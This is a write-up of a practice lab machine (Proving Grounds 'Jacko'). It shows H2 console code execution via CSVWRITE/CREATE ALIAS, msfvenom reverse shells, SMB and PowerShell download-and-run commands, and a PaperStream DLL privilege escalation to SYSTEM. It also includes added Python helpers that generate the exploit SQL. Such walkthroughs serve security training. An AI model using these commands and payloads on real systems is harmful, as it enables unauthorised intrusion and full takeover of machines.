Writeup for Jacko from Offensive Security Proving Grounds (PG)

Information Gathering

Service enumeration: a full port scan of the target (-H -t full) followed by a vulnerability scan (-H -t vulns).


Null sessions (anonymous SMB logons) are not allowed.


Port 80:
Port 8082 (H2 database web console):
The default credentials (user sa with an empty password) worked. From the console we can run SQL queries.
SHOW DATABASES shows us that there is a PUBLIC schema.
However, further enumeration of the database turned up nothing of interest.
The console also reveals the product version: H2 1.4.199. In this version an authenticated console user can write arbitrary files with CSVWRITE and bind SQL aliases to arbitrary Java methods with CREATE ALIAS, which together give remote code execution.
If we execute the following SQL statements:
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90), ... ,CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),'"'), 'ISO-8859-1', '', '', '', '', '');
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
we achieve RCE, with the command's standard output returned as the result of the CALL.
With command execution, we run systeminfo, which shows that the OS architecture is x64.
msfvenom -p windows/x64/shell/reverse_tcp LHOST= LPORT=445 -f exe > reverse.exe
Note that ports like 4242, 4444, etc. did not work. I used port 445 since I realised that I was able to copy files via SMB, so it likely won't be blocked by the firewall.
Copy the payload to the victim machine via SMB:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c copy \\\\\\ROPNOP\\reverse.exe c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
Running the payload:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("c:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
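The two kinds of statement used above are fiddly to write by hand: CSVWRITE writes the payload bytes as the column name of the inner query (empty field separator, delimiter, escape character, line separator and null string, so nothing but the name reaches the file), and the eval call needs JavaScript string escaping inside an SQL string, which is where the doubled backslashes in the copy command come from. The following Python helper is an added example, not part of the original writeup or of the published H2 exploit; it generates both statements in the same format as above and round-trips the CSVWRITE encoding as a self-check. The share address 192.0.2.10 and the remote DLL path it uses are placeholders.

```python
"""Generate the H2 CSVWRITE / JNIScriptEngine_eval statements used in the RCE chain.

Added example, not taken from the original writeup or the H2 project.
"""
import sys


def sql_literal(text: str) -> str:
    # H2 SQL string: only the single quote is special (doubled);
    # backslashes pass through, which is why the DLL path keeps single backslashes.
    return "'" + text.replace("'", "''") + "'"


def js_literal(text: str) -> str:
    # String literal for the JavaScript evaluated by JNIScriptEngine_eval:
    # backslash and double quote are escaped, so a UNC path \\host\share
    # ends up with every backslash doubled once it sits inside the SQL.
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def csvwrite_statement(remote_path: str, payload: bytes) -> str:
    """Build SELECT CSVWRITE(...) that writes `payload` verbatim to `remote_path`.

    Each byte becomes CHAR(0x..) inside a quoted column alias; with the
    ISO-8859-1 charset every code point below 256 is written as one byte.
    A 0x22 byte is a double quote, which must be doubled inside a quoted
    SQL identifier (standard SQL escaping), so it is emitted twice.
    """
    chars = []
    for b in payload:
        if b == 0x22:
            chars.append("CHAR(0x22)")
        chars.append("CHAR(0x%02x)" % b)
    inner = "CONCAT('SELECT NULL \"', " + ",".join(chars) + ",'\"')"
    # trailing arguments: charset, fieldSeparator, fieldDelimiter,
    # escapeCharacter, lineSeparator, nullString (all empty except charset)
    return ("SELECT CSVWRITE(" + sql_literal(remote_path) + ", " + inner
            + ", 'ISO-8859-1', '', '', '', '', '');")


def eval_statement(command: str) -> str:
    """Build CALL JNIScriptEngine_eval(...) that runs `command` and returns its stdout.

    The inner script is JavaScript, so `command` is escaped as a JS literal
    first and the whole script is then quoted as an SQL literal.
    """
    script = ("new java.util.Scanner(java.lang.Runtime.getRuntime().exec("
              + js_literal(command)
              + ').getInputStream()).useDelimiter("\\\\Z").next()')
    return "CALL JNIScriptEngine_eval(" + sql_literal(script) + ");"


def payload_from_statement(statement: str) -> bytes:
    """Recover the bytes a csvwrite_statement() would write, to check that the
    encoding round-trips (including the doubled quote bytes)."""
    start = statement.index("CHAR(")
    end = statement.rindex(",'\"')")
    values = [int(t[len("CHAR(0x"):-1], 16) for t in statement[start:end].split(",")]
    out = bytearray()
    i = 0
    while i < len(values):
        out.append(values[i])
        i += 2 if values[i] == 0x22 else 1   # skip the escape copy of a quote
    return bytes(out)


if __name__ == "__main__":
    # Usage: python h2_stmts.py <local dll> <remote path>
    with open(sys.argv[1], "rb") as f:
        print(csvwrite_statement(sys.argv[2], f.read()))
    print(eval_statement(r"cmd.exe /c copy \\192.0.2.10\ROPNOP\reverse.exe c:\users\tony\reverse.exe"))
```

The generated CSVWRITE statement is several times the size of the DLL, which the H2 console accepts but which is worth keeping in mind if the console is fronted by a proxy with a request size limit.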
Receiving the reverse shell:

Privilege Escalation


c:\windows\system32\whoami.exe /priv
We see that SeImpersonatePrivilege is enabled.
After locating powershell.exe, we can launch PowerShell.
Using the GetCLSID.ps1 script from, we can attempt to get CLSIDs.
IEX (New-Object Net.WebClient).DownloadString('')
This does not work: the script cannot find any usable CLSIDs, so this route is a dead end.

Windows OS Exploits

Transfer WinPEAS:
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("","C:\users\tony\winPEASx86.exe")
Run WinPEAS:
The OS exploits suggested by the WinPEAS output could be tried as a last resort.

Vulnerable Apps

It took quite a while to figure this out. Always check for vulnerable apps if WinPEAS does not find anything useful!
Checking the installed PaperStream IP version shows that it is 1.42.
This version is vulnerable to a local privilege escalation that lets us have a DLL of our choosing loaded with SYSTEM privileges.
msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST= LPORT=445
I initially made the mistake of using an x64 payload. Note that the application is found under Program Files (x86), so it cannot use an x64 DLL.
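To avoid the x64/x86 mismatch described above, check the architecture recorded in the PE header of the target before building the DLL. The following is an added example (not from the original writeup or the exploit) that reads the COFF Machine field and the optional-header magic of a PE image and compares a DLL against the process that will load it; the sample headers it builds in-line are constructed for the self-test and are not loadable binaries.

```python
"""Check whether a DLL's architecture matches the process that will load it.

Added example, not from the original writeup or the PaperStream exploit.
Reads the PE/COFF header: Machine at PE-signature offset + 4, optional
header Magic at + 24 (0x10b = PE32, 0x20b = PE32+).
"""
import struct

MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "ARM", 0xAA64: "ARM64"}


def pe_machine(data: bytes) -> str:
    """Return the architecture name of a PE image, or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    name = MACHINE_NAMES.get(machine)
    if name is None:
        raise ValueError("unknown machine type 0x%04x" % machine)
    # Cross-check: a 64-bit machine type must come with a PE32+ optional header.
    if (magic == 0x20B) != (name in ("x64", "ARM64")):
        raise ValueError("machine type and optional header magic disagree")
    return name


def safe_machine(data: bytes):
    """pe_machine() that returns None instead of raising, for bulk checks."""
    try:
        return pe_machine(data)
    except ValueError:
        return None


def dll_fits_host(dll: bytes, host: bytes) -> bool:
    """True when the DLL has the same bitness as the host executable."""
    return pe_machine(dll) == pe_machine(host)


def build_sample_pe(machine: int, magic: int) -> bytes:
    """Constructed minimal header for testing: DOS stub, PE signature, COFF
    header and the optional-header magic only. Not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew points right after the DOS header
    # Signature, Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", machine, 1, 0, 0, 0, 0xF0, 0x2102)
    return bytes(dos) + coff + struct.pack("<H", magic)


if __name__ == "__main__":
    import sys
    # Usage: python pe_arch.py shell.dll host.exe
    with open(sys.argv[1], "rb") as f:
        dll = f.read()
    with open(sys.argv[2], "rb") as f:
        host = f.read()
    print("DLL:", pe_machine(dll), "host:", pe_machine(host),
          "OK" if dll_fits_host(dll, host) else "MISMATCH")
```

A binary installed under Program Files (x86) is normally 32-bit, but the header check is cheaper than a failed exploit attempt, and it also catches the reverse mistake of handing an x86 DLL to a 64-bit service.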
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("","C:\users\tony\shell.dll")
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("","C:\users\tony\49382.ps1")
Run the exploit: C:\users\tony\49382.ps1
Once the exploit is triggered, we receive a reverse shell running as SYSTEM.